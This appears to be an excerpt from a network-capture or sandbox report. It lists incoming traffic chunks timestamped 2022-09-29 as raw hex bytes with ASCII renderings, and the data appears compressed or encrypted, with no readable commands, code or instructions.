                                                                                                                                                2022-09-29 12:51:37 UTC15130INData Raw: 17 fb 1b 3f 67 00 c5 c6 97 9f e8 ad 78 59 c0 e2 59 da 32 4a 39 41 4e cd f7 2f 79 1e 9f 8a b8 dc 68 23 75 34 b7 01 fa 10 e8 53 34 fb bc 5b e2 2d b7 9b 94 bf 2b 92 0f 9b 15 e5 7b 7e 99 a8 b2 7d cb 7b 83 c0 90 42 c9 54 66 11 c8 a9 48 9c 90 fb 95 f6 fd 0f 1d 89 07 03 40 04 d9 4d 91 1f 35 be b9 6b 2c 55 a5 f9 00 b5 70 02 eb c3 7a 90 7b 88 b6 90 1a 03 11 f5 1a ed 95 95 72 1e cd 33 3d a5 6c 49 ba 2d ce 50 7d 06 8e 1b 52 0f ee d3 94 8d 26 cc 97 28 a7 5a fd c7 a5 4e e2 d9 4d aa 82 83 a4 98 90 18 d3 3f ab 1f ff 71 f0 51 34 44 28 d7 a5 fd 75 41 92 20 3f cf 17 fa d8 e0 67 5c 18 73 7e a3 32 1a d8 c0 c7 43 ce f3 81 b2 96 95 ab 11 54 68 a5 2f 75 c1 64 9a b4 e0 7a a1 7d 1e e5 b3 d4 b2 15 56 1e 6b ec a2 08 0c d3 3a 20 f2 1c 65 28 f3 4d f4 42 e4 20 88 3a d1 81 cd 16 0d 69
                                                                                                                                                Data Ascii: ?gxYY2J9AN/yh#u4S4[-+{~}{BTfH@M5k,Upz{r3=lI-P}R&(ZNM?qQ4D(uA ?g\s~2CTh/udz}Vk: e(MB :i
                                                                                                                                                2022-09-29 12:51:37 UTC15146INData Raw: 94 62 97 4a 46 4f cd 35 0e 8e e3 ed dc 40 8c f1 ab 4e 63 6f 6a 35 97 bd 78 fb 73 0c 8c c6 f5 2b 9c 90 77 d8 05 56 3b a6 96 de e1 61 7e 5d d7 04 3f 40 74 bc ad ab 6f 39 87 44 1a 09 c7 f7 f3 b4 84 b6 4f 4c 93 e4 e5 a8 2c de a2 38 1d df 81 65 b6 99 ae 24 64 a5 5a f5 9a d5 26 e4 09 30 11 30 4d 21 92 be 32 78 4b 47 15 fe 79 ae 0e 44 e4 ed 2e ac cf 3a 54 76 25 4e 0d 1e 82 64 3f dc 71 95 3d 90 3d 39 92 24 a4 a9 13 01 31 4b d4 ef 83 5d cb cf a3 56 9d fa 47 a4 e8 9d 87 34 4d 2c 01 be c6 6f 58 5e 9b 36 d3 59 cb b7 74 33 f2 05 e4 c0 78 74 6a f6 93 ec 8f c0 42 b3 59 14 3c ae 6b 8f 71 97 ce b7 07 dc e5 10 92 61 9a f0 30 41 04 6e 47 8d 45 45 15 fa 06 5b 43 d6 5a 75 99 0b 6e 72 87 90 94 b0 cc 02 e5 5c 15 7f 37 6f 81 89 67 32 8f b9 69 7c ea 63 91 46 86 b2 99 e9 28 a0 67
                                                                                                                                                Data Ascii: bJFO5@Ncoj5xs+wV;a~]?@to9DOL,8e$dZ&00M!2xKGyD.:Tv%Nd?q==9$1K]VG4M,oX^6Yt3xtjBY<kqa0AnGEE[CZunr\7og2i|cF(g
                                                                                                                                                2022-09-29 12:51:37 UTC15162INData Raw: 74 fd ea 09 c3 97 21 d8 28 8c 68 e1 0b 40 5a 0b 39 aa ff 8f c5 46 d4 59 46 d3 67 0a 7e 9d 57 76 b4 80 84 be 7e 3e 53 0c cb d4 bc 04 6f 67 16 aa da 2b 45 25 d2 a1 42 d5 c4 bd 8e 34 f4 db b8 b6 5d 59 4a d6 c2 98 e1 76 bb ef 7a f5 de 45 f7 63 6c b2 34 36 21 f2 17 94 53 01 6a fb 19 5c 2c af 87 bc 5d 34 a5 64 f1 ac cb 4f fe 56 22 34 29 d9 e2 d5 09 33 07 36 1b b3 d2 5b 1c a2 3f 59 49 6e ee 1f 2e fd a8 c6 36 55 3b 94 79 1f ee b8 3a e6 ac c8 c0 0a 4c 02 a8 43 3a 92 6a 0f a0 f4 9c b4 80 8a 9b 65 61 da 21 f7 cf 0b 5d d8 9e bf 29 eb 90 af cd f5 e2 c1 32 92 26 bf ad ba a1 34 57 49 f1 2e 49 21 f0 99 01 69 09 49 c7 7d 8e 60 1a 41 8a 2e 27 8d 4e fd 72 ef f1 b7 dc b2 e8 ca 82 ce 79 60 92 7e f4 05 8e 43 24 2c 9e e9 82 dd da f0 26 23 3d 68 b9 4d 93 da 83 e4 47 28 d7 bf 35
                                                                                                                                                Data Ascii: t!(h@Z9FYFg~Wv~>Sog+E%B4]YJvzEcl46!Sj\,]4dOV"4)36[?YIn.6U;y:LC:jea!])2&4WI.I!iI}`A.'Nry`~C$,&#=hMG(5
                                                                                                                                                2022-09-29 12:51:37 UTC15178INData Raw: c3 f7 67 2a dc d4 0c 19 b1 6e 36 b5 54 36 ea cd 27 a5 a6 36 32 9a bd f6 0b 1e 8e 04 ed 38 d6 e3 74 7d 79 06 94 39 cb 0a b6 8b c6 27 6e f6 8f 45 be e7 68 17 95 a5 43 bf bc 7c bf a6 0c 29 82 b6 c5 44 16 64 52 a9 f4 80 61 aa 8f ca 15 5d b7 f9 9c 51 05 bb ff 20 cf 9d 4c 2c 43 2d 87 29 dd 15 d5 b2 63 07 72 db f1 6c fe e4 c9 66 19 d0 52 97 83 a2 eb 81 a6 8f 9b 30 82 5f f0 86 01 fd 25 b2 ce 6a 08 f9 87 8a ed 9f 20 de e4 ce 34 d1 20 70 6a f7 82 4a 4c 0c 52 98 2d d5 ed e9 7d 99 c2 7b 9c e9 fa f8 44 d3 fe 72 73 9a 34 66 f7 45 45 2f ed 28 36 12 29 84 34 b3 af b6 a2 35 4e b6 f3 0c 4b 19 b4 c9 dc bf da a5 f2 89 cc 59 3d c8 3a 2f bd 3f 42 37 73 de e3 5a dc ba c0 24 ed 4a e0 16 86 9c 01 78 ec 22 34 01 b1 a6 30 10 7f 2e d9 8d 9f 85 0f 8e 47 54 05 ba 5c 61 75 9a 67 7b 59
                                                                                                                                                Data Ascii: g*n6T6'628t}y9'nEhC|)DdRa]Q L,C-)crlfR0_%j 4 pjJLR-}{Drs4fEE/(6)45NKY=:/?B7sZ$Jx"40.GT\aug{Y
                                                                                                                                                2022-09-29 12:51:37 UTC15194INData Raw: 1d 2a 37 55 cd 34 38 32 2c 61 1c ed d6 f7 f7 64 aa 40 05 56 90 f8 49 52 92 66 79 c3 90 31 d7 4f b5 1f 21 6c db fc 38 3e 07 a6 41 23 17 55 5a 51 9b 6a ee 9a 29 05 2a db a4 38 7d 93 ab 1e 23 12 a6 45 0a 85 f4 f6 95 4b 3b 90 c7 07 77 58 6f 51 32 ce fe 70 12 45 16 01 1f 2f 84 41 d9 81 10 70 fd 14 a8 1d 94 64 61 c4 01 57 8f b1 66 a2 22 cf 6a 7d 21 15 97 62 50 58 0f 41 9e ff 04 05 e1 9e 29 a9 66 d7 00 32 41 60 f3 e6 5f b0 7b 08 da 9c 1e 79 eb 12 2f c8 9a ec 44 65 a0 07 44 80 24 37 14 6f ea d8 d9 f2 8a ef 87 3c c3 09 5d 78 e7 cf 2e 1c 14 4f 60 40 7d e9 11 c2 4b ae 12 66 d3 73 aa 0b 9d 84 ed 82 cf 35 27 0b c1 81 19 72 45 67 49 f7 91 9b da 53 04 87 31 ee 1d a9 ac 0e 47 e7 c5 cf 29 e9 bb b2 e5 53 95 a2 b6 44 1c a9 32 39 6a a6 b0 32 a0 f3 4c 94 80 20 67 a4 4f e2 2c
                                                                                                                                                Data Ascii: *7U482,ad@VIRfy1O!l8>A#UZQj)*8}#EK;wXoQ2pE/ApdaWf"j}!bPXA)f2A`_{y/DeD$7o<]x.O`@}Kfs5'rEgIS1G)SD29j2L gO,
                                                                                                                                                2022-09-29 12:51:37 UTC15210INData Raw: 33 b3 25 99 5b 61 22 73 f4 7c ad 83 b4 83 fb 4c 32 f4 86 c7 79 3d cf 3a f8 25 d8 88 cc c7 40 53 2d 42 44 ec cc f9 d7 81 17 6e b3 64 9b 5f b4 72 b1 ee ab 2a e6 d3 2a 72 5d ae 6e 0d cf aa 0c 81 4c 28 68 b3 4a 83 63 f0 f8 06 51 0e 46 b4 cd 2f f2 69 9d d7 18 b0 95 c5 7c ba eb 57 38 00 ec c7 1d 99 5b 0c 72 f1 d0 81 14 97 f8 15 67 57 67 9d 74 2d e3 78 b7 2e 59 70 10 24 7e 50 2c 9a 02 07 1c cc bf 07 c1 ea 07 b7 89 20 f3 e1 c5 7a 83 93 bf b6 64 ea 8d 7c 2b c9 11 02 cf 01 b5 4a 1e 43 07 f9 92 fd 7e 2e 83 d8 21 1b 40 2e 1b b9 7c b6 60 98 f8 66 f4 75 2e d8 3b 3e a0 0c d4 37 42 24 4b 1a 40 83 a9 be aa 70 44 8d 13 5e 79 47 7e 18 4b 4e de 61 e9 ee ee d7 74 de 3c d6 71 99 59 14 45 51 73 62 f2 28 e7 03 ba 74 74 4d 24 bd 4b b9 63 74 39 01 e9 83 57 68 17 2b 28 50 8e 7f dd
                                                                                                                                                Data Ascii: 3%[a"s|L2y=:%@S-BDnd_r**r]nL(hJcQF/i|W8[rgWgt-x.Yp$~P, zd|+JC~.!@.|`fu.;>7B$K@pD^yG~KNat<qYEQsb(ttM$Kct9Wh+(P
                                                                                                                                                2022-09-29 12:51:37 UTC15226INData Raw: 0d cb 74 7e 24 bc c4 c4 8b 62 85 54 8f 97 9f ac f5 dd ca 4e ad 78 6f c6 8d f2 57 11 6a 47 36 ce cf 4e 19 77 bf 5f 60 7c c4 be 05 fb a6 40 19 02 3d 4d be 83 5b ae 87 67 01 df cb 7e f3 ea 06 ed 5c 18 6e 7c e3 27 50 4d 43 00 e6 15 e2 4d cd 7a 68 cf d9 2c 27 d2 a5 02 ea d1 56 7e db 68 ad 3e 6e f4 aa 66 35 bf e2 13 f2 b7 0f aa e2 fb 79 f3 11 68 0f 3a 3b 09 22 48 63 0c 63 b3 3b 70 4b 64 e4 bd 9c 29 9e 92 1a 1b 41 c5 df a5 dd 87 78 8d 22 42 5e b7 6b 80 97 99 95 e3 7b a8 45 a5 9f d6 e6 69 b6 a6 ac f3 e5 01 d8 8f 47 36 46 50 a5 ef c4 0b f1 16 e1 3c d5 55 06 87 0e d9 7f 39 0b 42 46 09 90 97 6e b7 62 1d 62 ab c6 55 10 26 e0 10 50 2b 53 e8 26 6a 22 9a a2 62 20 34 c5 30 b9 30 3f c1 6e 92 d0 6e 90 37 9f 5c 43 c8 92 a0 4a 8c fa 63 33 4b 28 cc 26 d1 25 f1 2f 55 08 58 b1
                                                                                                                                                Data Ascii: t~$bTNxoWjG6Nw_`|@=M[g~\n|'PMCMzh,'V~h>nf5yh:;"Hcc;pKd)Ax"B^k{EiG6FP<U9BFnbbU&P+S&j"b 400?nn7\CJc3K(&%/UX
                                                                                                                                                2022-09-29 12:51:37 UTC15242INData Raw: 6c b1 e2 87 d7 07 57 ba 0e 14 19 18 86 6c 7e fa 63 47 29 d5 36 3e e9 8d a5 03 7d 72 0c fa 24 a4 5f 78 0d 79 7b de da 24 c5 8e c8 47 b6 f6 23 70 28 f0 0b fc 98 9d 7d 31 74 b4 63 ee df 24 e1 d9 2a b1 4b f7 0f ae c8 51 32 b3 e9 59 3c 69 b8 1e 92 1a 60 55 e6 cc b4 28 6f 7b 34 1f 96 2e bd 14 41 dc e0 a8 34 9b 4f 21 e0 4f 42 2a 21 c4 ea 4e 11 75 d2 99 1d 42 c7 72 ea 2f b8 53 d7 71 5c f6 92 3a ab 37 f3 08 d1 b0 d6 fa 5c 83 13 6e 27 a4 1d 9f e0 09 34 45 8f 2f 9f 1a c8 68 dc 15 97 ef 34 3e 71 51 3d d1 b2 9d 89 57 ad b8 e7 04 7d 72 ac a2 14 9e 9c be 27 08 dd 26 0c ed 82 65 b7 ab 0d 55 a3 fd 7a 03 d2 4c 0c f3 53 22 26 7a 95 b7 d7 69 a1 ca b1 a4 60 7b ab ba ad 88 52 f2 d1 2f 82 bf 54 e2 d7 c3 f8 ea 24 98 27 21 7d 00 b1 e5 6e f9 34 cf 3b 42 4d 4e c4 58 ce 84 38 35 5e
                                                                                                                                                Data Ascii: lWl~cG)6>}r$_xy{$G#p(}1tc$*KQ2Y<i`U(o{4.A4O!OB*!NuBr/Sq\:7\n'4E/h4>qQ=W}r'&eUzLS"&zi`{R/T$'!}n4;BMNX85^
                                                                                                                                                2022-09-29 12:51:37 UTC15258INData Raw: 5a 5c b5 0c a6 c0 e6 17 e5 63 bb ba e4 5b 63 4a 60 00 90 1c 49 0a a0 ba a1 2f 3e 02 d2 0e 9b 1a 5b 28 db 0b cd e5 d3 8a 5f 6d 96 44 29 51 b6 7d 71 16 c1 61 92 e6 f5 46 c2 3a 1f 35 07 3a fe ce 22 b7 c3 6d 14 5b ac 86 74 37 b6 e8 ec e2 5a 95 82 c2 a1 5a 74 bc 8c c3 f8 75 cf 74 eb 69 81 22 4c 1c 1e fc 45 f6 04 b8 c5 6e 41 8d bb 77 ab 76 1c ce f9 f3 77 93 c6 d6 0f 8d 42 cf f2 d4 1e e1 9e f6 bc 43 3b b0 a1 85 a6 40 52 dc 0f 55 df 3c 59 49 64 37 14 61 63 50 0a da 69 04 28 e3 e0 68 cc 1d 7c 94 bd 64 47 5b f6 ac d6 da 6c 12 d5 b5 5d 4b 15 2a 7b bf 33 c2 7f 2f 51 bf 07 19 9a 27 a5 85 a8 63 e9 5b a5 cf fe a2 7c 9c 95 35 3d e2 3a bf 9e e7 6b 89 a8 cc fb ae 13 33 fd b9 16 37 70 7e d1 be f1 33 73 72 0a 81 23 6a ca 3e 56 eb d5 5b 37 3d 25 88 39 f1 e4 7c 58 7d 17 ab 4d
                                                                                                                                                Data Ascii: Z\c[cJ`I/>[(_mD)Q}qaF:5:"m[t7ZZtuti"LEnAwvwBC;@RU<YId7acPi(h|dG[l]K*{3/Q'c[|5=:k37p~3sr#j>V[7=%9|X}M
                                                                                                                                                2022-09-29 12:51:37 UTC15274INData Raw: 04 2b 89 e1 62 bc 6f a7 d3 e8 ec 57 41 45 f4 11 19 4a 14 61 cb 6a 4e 45 1c 0b 84 51 d6 f4 bb 69 5c eb e0 85 01 43 03 01 d4 2c 52 0f ec bd f0 f9 8d 50 45 cf 49 a7 ac 4b 24 4f e7 7c 3b 0e 0d 79 57 16 cb 4d ff 79 1c c2 fd 25 22 3a b3 93 3a cc cc c5 fc e8 de 0e bb 7a 01 9f 81 36 7b 98 dc 55 87 6d 57 f4 cf e8 0e 98 14 d8 10 83 6f 35 4f 7b 97 2b 6c 9e 1d df 81 a2 30 d9 08 b8 37 ab 6e 11 47 4c 82 d6 bd 90 b9 24 5f a0 7f 0a 81 a3 ca f9 04 a1 b1 97 6d 12 72 6c 0c e7 b8 aa 30 2f 94 eb d6 44 bb 53 cd 82 8c 9d 6e a1 fb d8 7b ce 9c 6e 87 b0 54 65 41 50 f0 29 54 de 93 c0 89 d8 79 90 f3 d7 33 cf e8 89 06 5c b2 e7 94 37 25 a2 16 b7 5a f6 f9 2f 1a fd 23 9e ac 32 ed 0a 23 d5 a7 e7 06 2f 9b 22 f4 91 64 b3 71 fd 83 b7 eb bc 59 4e 07 30 b3 46 25 0f 13 35 52 dd 77 8a 52 81 e6
                                                                                                                                                Data Ascii: +boWAEJajNEQi\C,RPEIK$O|;yWMy%"::z6{UmWo5O{+l07nGL$_mrl0/DSn{nTeAP)Ty3\7%Z/#2#/"dqYN0F%5RwR
                                                                                                                                                2022-09-29 12:51:37 UTC15285INData Raw: 3d ae f0 98 ab d3 1e b9 a1 5a e6 9b 67 19 7f 38 52 e0 74 d5 33 78 b8 93 1c 73 b2 24 29 d2 c4 30 3c 07 bf c2 d9 93 bd 9f e5 7c 2a dd 8e b6 88 87 02 ce ed f8 0e f9 ad 9f 68 16 9a 8c fc fc 5e dd 0c e8 02 9f e2 48 13 b2 07 8d 27 c6 ea c3 d9 a1 51 14 91 2f 0a 61 f9 ed fc bc 67 b8 01 9c 56 1b f4 18 0a 8f de 29 65 26 95 ab 63 d2 66 0f 87 93 67 c2 84 c7 e7 0c fb a3 4d cc 7c a6 d2 1b 9f 27 da 4e 48 e1 52 36 31 d3 ff 41 39 7c f1 04 df 4e a9 e2 7e a2 3d f3 56 b8 88 d9 49 b3 47 12 7d 7e dd a3 0f d1 1a 42 ca 18 20 78 a0 45 15 ee fa 2e eb fb c1 52 86 0b 08 1a d5 28 24 34 8e 7c f1 f3 7a d4 08 ff c1 56 33 46 79 46 56 f3 d2 0e ea 74 fc 0c 80 19 36 eb 68 fd bd 44 46 ff b2 ff 9a 65 10 4f 85 06 d2 8a d5 62 58 03 56 6b f2 00 99 66 39 25 60 12 01 f8 d8 dc cd e6 2a 14 df 01 70
                                                                                                                                                Data Ascii: =Zg8Rt3xs$)0<|*h^H'Q/agV)e&cfgM|'NHR61A9|N~=VIG}~B xE.R($4|zV3FyFVt6hDFeObXVkf9%`*p
                                                                                                                                                2022-09-29 12:51:37 UTC15301INData Raw: 0d 1e 2e d7 a5 92 f0 c3 2e a8 51 2c 57 55 8e fe 0f 15 fd fb 6e 04 cc 2d b1 7e b6 8a c0 22 5c dc 84 52 48 ec ab e1 c8 44 0e 8d a8 76 a6 d8 28 9b 7a ff cd 9f b8 7d 64 68 b1 04 5f 78 d0 f5 13 ad 74 25 68 1b 78 ad a6 5e 32 be 60 a7 f4 ef ce 5b 8b 2e 67 02 ad 72 83 1b 07 a2 8b c6 9f 95 09 66 ea a0 bc 5a 17 3b 61 1e af b0 44 59 74 16 38 5b f7 95 54 d6 49 2b 1e e2 56 5b c5 c0 db f7 a2 ed 46 a8 98 06 90 71 8a 1b 00 36 e3 f5 6e 0c 99 5f e7 05 3f 61 1e 2f 25 56 da c4 05 24 80 9a a8 2b b5 93 31 3e ec 78 50 08 fc a6 c0 95 03 20 e6 f0 ee 13 38 f5 72 c2 fd 6a 9e 78 ac 74 8f c9 3e 26 38 d4 a6 1b 76 70 15 c7 5a 95 05 a5 53 05 ac f6 87 69 53 ad e2 b6 53 0e 5c 0b de b8 14 13 f0 6b ec ba a5 4a 33 0e d8 95 e6 56 57 d7 4e 81 ba 44 f6 88 1e 2a a4 19 48 c3 03 cc 3b a4 d9 66 db
                                                                                                                                                Data Ascii: ..Q,WUn-~"\RHDv(z}dh_xt%hx^2`[.grfZ;aDYt8[TI+V[Fq6n_?a/%V$+1>xP 8rjxt>&8vpZSiSS\kJ3VWND*H;f
                                                                                                                                                2022-09-29 12:51:37 UTC15317INData Raw: ad f6 6d 6f b3 fc 3c 09 ea e2 d7 26 1b 64 a6 bc 1f 7b 61 7e a7 2d 50 62 91 b1 8a 3c f6 11 c0 e5 24 0b 22 f5 24 8b 15 8c 8a dc fc 5a 89 97 a3 60 eb 07 3f 17 85 1f 7f 5d 99 3a 93 12 19 f3 a9 26 da 2d 06 10 98 1f 37 e1 e7 79 d9 4d 96 68 45 f7 e4 f5 83 2c 4e 8c 70 03 93 17 67 be ee 6c 3d 45 6f 88 f2 57 ff bb f2 0d eb af af f9 b0 1e 37 d6 7c 12 b0 38 0b 44 59 1b bc 19 5a f2 50 ff 92 91 49 fa e3 d3 64 c5 79 1b 7f 57 68 4d 2f 20 57 3e 2f f0 29 9b ed d4 21 e4 bb 8b 6c 09 a0 ae 69 06 58 7b 42 8a 01 82 04 c4 3f 60 a8 c5 13 38 77 c3 c7 36 a7 01 cb bc 46 b3 dd ab aa cb 0f e3 3d 3d cf d6 04 b2 27 5c 5c e1 d1 78 d1 f5 e6 98 bd 95 70 d5 3b a4 28 3b 3a 83 2a 39 f2 cb 54 90 72 45 21 a3 0a 57 f7 04 b5 f9 86 43 c0 c9 36 fa 33 27 69 b3 ad c4 c2 8f f9 1f d1 b6 09 98 24 70 88
                                                                                                                                                Data Ascii: mo<&d{a~-Pb<$"$Z`?]:&-7yMhE,Npgl=EoW7|8DYZPIdyWhM/ W>/)!liX{B?`8w6F=='\\xp;(;:*9TrE!WC63'i$p
                                                                                                                                                2022-09-29 12:51:37 UTC15333INData Raw: f8 4c 86 ee 5e 25 ef 26 d7 6f ae c1 87 26 01 c7 8f dd 01 e8 5c 8d 5c 0c b2 6b 6c 82 5e a9 63 99 b8 b3 99 03 f3 0f 7a 21 c9 2e 7d 2b e3 a9 ce 42 41 5a 8b 94 85 33 56 80 7e b5 61 12 b4 11 bf 9c d3 24 fe 54 be 55 7e 7a 3c 6c ee 10 3a 25 de 48 61 ff 14 06 af 03 54 f0 a0 b0 c9 fb 0c a8 bd f4 f0 cf 6c d5 de 4e 1c 1f 5c 6b 92 d6 77 3c d8 fc 16 bc d1 33 c2 ac 3d 66 56 92 9e 12 11 8a 7c 5b af 9a d1 0b 95 36 7e 83 07 ec 3d 8e bd 02 1b d6 75 18 92 7d 46 d9 1b 9e 31 9f 76 4a e7 48 ed 58 f1 54 6d da d5 fb a7 28 46 ee 59 f0 2c 69 af 3e b1 9a 73 10 97 58 01 ae b5 2c 65 37 2d c5 37 9e fc 78 d0 c4 57 e0 c3 c1 a9 2b 22 3c 24 bb f0 b6 a6 d3 b2 e3 fc 34 db 62 ea 4c 03 92 f1 af 50 fc eb 8e 0b 93 3a ec bd 53 fc 10 8e c9 47 ac de 61 eb ea 0d 81 b2 7a fd 0d 87 80 05 43 d7 99 f6
                                                                                                                                                Data Ascii: L^%&o&\\kl^cz!.}+BAZ3V~a$TU~z<l:%HaTlN\kw<3=fV|[6~=u}F1vJHXTm(FY,i>sX,e7-7xW+"<$4bLP:SGazC
                                                                                                                                                2022-09-29 12:51:37 UTC15349INData Raw: 8e 35 9a 22 c9 6f 07 29 f3 e4 b3 ad 81 7d c8 a0 75 fd b9 6e 0e 56 a4 f4 b6 50 5f 7c e2 1b a1 8c 90 5f d8 45 a4 7e 22 35 b8 e9 47 a3 b9 15 88 9d 38 ea c0 30 8b e9 5d d8 29 93 e1 d4 56 5a 18 47 16 49 77 b0 fd 5c 5a 34 07 e7 36 42 2a 9f 11 11 36 99 c8 75 5f 6b 9c 86 27 d0 a1 a8 62 d0 57 bb 4e 75 47 d4 10 a9 c4 be 1c 6c d1 37 a7 a1 94 d9 94 84 4e df f3 cd 94 de 2f e1 fe c2 9c bc e8 e2 fd b9 dc 67 26 84 20 bc 45 3b fc 0d 32 2d 41 81 26 fa 1e 70 aa c9 1e 91 6e ca 48 ed 01 32 f0 73 87 52 b0 49 b4 5e 8a ac f4 d9 28 11 df 4a af fb 41 85 90 b6 38 5d 00 bc 6d e2 0f 3c 50 79 1b c3 a7 dd 12 cf 83 bf f0 3d 0d cf 61 c3 a4 84 61 ff 20 ee 94 cf ef a9 6f 72 59 95 9d 33 02 0f 9d 84 d5 f4 78 21 18 5d 22 9c 84 fe 5f 6b ce 25 ac 65 52 d8 5d 4b 45 e7 5e e3 5c 18 80 6e 9a 01 62
                                                                                                                                                Data Ascii: 5"o)}unVP_|_E~"5G80])VZGIw\Z46B*6u_k'bWNuGl7N/g& E;2-A&pnH2sRI^(JA8]m<Py=aa orY3x!]"_k%eR]KE^\nb
                                                                                                                                                2022-09-29 12:51:37 UTC15365INData Raw: e1 c7 04 12 a7 f9 23 69 2d fc a8 00 b2 4d 6f e4 ee 17 64 92 73 49 97 6f 13 0e 5a b3 99 c5 94 59 01 34 4b 0c 5c 9e 6d 81 3f 6b 8e 3c 70 44 74 56 c0 fe ba 4c 40 84 da 10 d0 a1 25 01 7c 72 52 a4 29 6a e4 83 1b f1 2f 34 c9 c2 f3 a4 3c d8 e3 0c 20 6c 74 2b 59 c6 87 cf 67 3c 0b c4 ab 16 0a f3 3b 0e 7a 60 29 60 7e a4 6e 39 de 26 ff 44 8f 46 a6 fc 7c 04 c8 eb c1 66 05 f9 ac d3 0c 6f 21 76 79 be d0 8f 6a e7 28 e4 de 07 a4 fa a8 4a 0f ad 6d 07 0c fb a3 17 7b 33 ea 85 ce 56 97 73 6e a2 f0 6b f1 5d 0b a8 a5 69 cf c1 5e c8 70 d9 86 56 61 97 e8 46 fd df 1f a1 90 35 72 e3 0b 9a 33 a3 97 dd eb c1 24 4f 43 87 83 1e 79 01 2d ed ac 82 4e b0 f3 de f2 15 98 7a 8d 4e c8 68 5d a2 5b 0b ba 5e af 3c 9b 31 fe e3 98 3e 11 56 a5 ae 29 f0 6c 3a 59 6a a6 83 71 87 bf 25 de 9b a1 8a 55
                                                                                                                                                Data Ascii: #i-ModsIoZY4K\m?k<pDtVL@%|rR)j/4< lt+Yg<;z`)`~n9&DF|fo!vyj(Jm{3Vsnk]i^pVaF5r3$OCy-NzNh][^<1>V)l:Yjq%U
                                                                                                                                                2022-09-29 12:51:37 UTC15381INData Raw: 48 21 00 21 01 15 d5 65 f2 6b 8f 71 34 8d b7 3e a4 98 4e dc 3f 42 a7 1d 35 07 bd 5b 3a 75 88 b9 a8 ee 7f 34 00 6c d3 71 d9 14 36 8b 84 c9 50 c2 dd 71 c6 80 a3 ed d7 b3 51 43 09 31 25 87 d5 de 82 50 f9 7f d2 f5 7a 23 77 cc 86 2e 33 f8 98 b1 c9 97 a4 d0 fb 55 d8 62 c7 0b 72 76 ac 71 e0 a9 5a f6 cf af 69 b9 5e 20 cb 5e 7f 0c 2d cb a5 4e 9c 71 e9 bc ae 93 6a fa a8 5b 76 d7 b1 01 d4 10 ad 72 64 d3 6e b1 ad 03 29 23 9e dc d3 6a c0 27 a9 9d 7d 7c 46 f2 ae 5e ee 06 52 8d 61 7d 3b 34 e7 38 2b 81 3f 16 0c 61 13 ee f5 da 86 4b 95 22 74 fc ff 39 c3 52 79 99 6b 5f 61 73 5c a1 fe 9e 25 68 c3 1b 1d 90 e3 0d 7f 1e a5 62 1e b9 24 86 a0 8d 97 7c 0d 5f 7d 19 65 48 ca 56 7a 70 f2 2e db ab 50 04 4d 19 15 6f 7b 24 90 e0 79 b4 c6 20 7c f4 07 b3 63 09 65 53 6d c6 06 bb 8c 0e 4e
                                                                                                                                                Data Ascii: H!!ekq4>N?B5[:u4lq6PqQC1%Pz#w.3UbrvqZi^ ^-Nqj[vrdn)#j'}|F^Ra};48+?aK"t9Ryk_as\%hb$|_}eHVzp.PMo{$y |ceSmN
                                                                                                                                                2022-09-29 12:51:37 UTC15397INData Raw: fa 71 e9 fb e3 cb ff 7c c8 16 90 e6 0f 91 e8 48 ce b4 64 07 62 00 92 b2 0e 9f 04 87 b1 93 2e 6e fc a8 6b c8 3d f8 65 0d 15 db b3 f5 ea a5 b5 27 cd 9c de 9f 0e e1 ae 4e 08 2f a9 e7 2f fe 01 4a 79 c1 1d 68 f4 6a 07 d9 ef 8d df 2a b6 94 cd 67 96 01 e8 a8 4e e0 49 97 0d b8 38 64 69 59 26 37 2c 22 e3 d0 24 aa d2 e0 f0 3f 39 bc 3d 24 19 f8 fe bd ad 52 8d 79 23 f8 ac 46 64 9b 04 1c 9f a4 f5 6a 9f ef dd ac ce 6d 02 8c 46 c1 10 6c a7 f2 55 8e 0a b8 34 1b 5b 8b c2 24 11 6e 57 ac c5 ce ce 7b 7a 90 3f ff 8b d7 27 6d d8 d3 c8 33 8a e7 69 0f 95 74 5c ee a4 7a b9 54 e9 ea 69 b6 30 97 7d 11 8a 13 99 67 56 6e c6 91 82 60 dd 02 70 03 4b 7c 0c 81 37 ae 34 c3 1c 88 45 2a 59 17 30 3b f1 68 e9 28 ef 7f f8 47 0d d8 3f 78 01 fd 86 27 85 24 14 8a 98 d5 93 00 08 88 14 80 22 7a af
                                                                                                                                                Data Ascii: q|Hdb.nk=e'N//Jyhj*gNI8diY&7,"$?9=$Ry#FdjmFlU4[$nW{z?'m3it\zTi0}gVn`pK|74E*Y0;h(G?x'$"z
                                                                                                                                                2022-09-29 12:51:37 UTC15413INData Raw: d9 27 cd 15 f3 5d 4d ba ef 6c 0b 56 37 18 2b 4f 40 ae 99 40 24 c1 ff 0f be a7 32 3d f0 88 7e f1 92 e2 de 26 31 56 7d d7 ea b0 e5 eb 3a b6 45 15 3c bd 52 1d 16 a3 3b 6f ef 7c f6 66 b4 7f 52 8a 11 89 fe 9e a6 01 fd 90 7d 07 e7 ad 0c 6f 97 49 5a 86 9e e0 c4 95 56 08 52 e6 e5 da 82 b9 ed fb af d9 72 fd 92 8c 9a c4 5e dc c1 66 fe 00 22 a3 2e cf 31 82 0f 32 5e 51 7f 91 eb d2 f8 e3 cb fd 3e 6b b0 a8 d8 fb 16 3d 3c 35 17 a4 70 20 1c 3d b2 d3 06 4d 25 f8 6b 9b df 3e f3 93 87 c3 d2 04 f7 aa 2a db c7 fd f5 a9 34 73 e9 27 d5 d6 82 e4 7e 0a 8f 9c e1 bd de 55 68 35 11 03 ef e8 6a 90 55 07 9f 84 50 cf 73 bb af fd 9f 2d 88 2a b8 78 d6 93 f6 d4 bd bc 2e 0e a3 0f 15 60 79 bb a8 a8 fe 23 62 f7 6b 25 c3 02 bf c4 8e 2d ed ac b3 07 b3 35 d2 62 c2 38 01 3b b3 ce e9 d8 98 ee 0a
                                                                                                                                                Data Ascii: ']MlV7+O@@$2=~&1V}:E<R;o|fR}oIZVRr^f".12^Q>k=<5p =M%k>*4s'~Uh5jUPs-*x.`y#bk%-5b8;
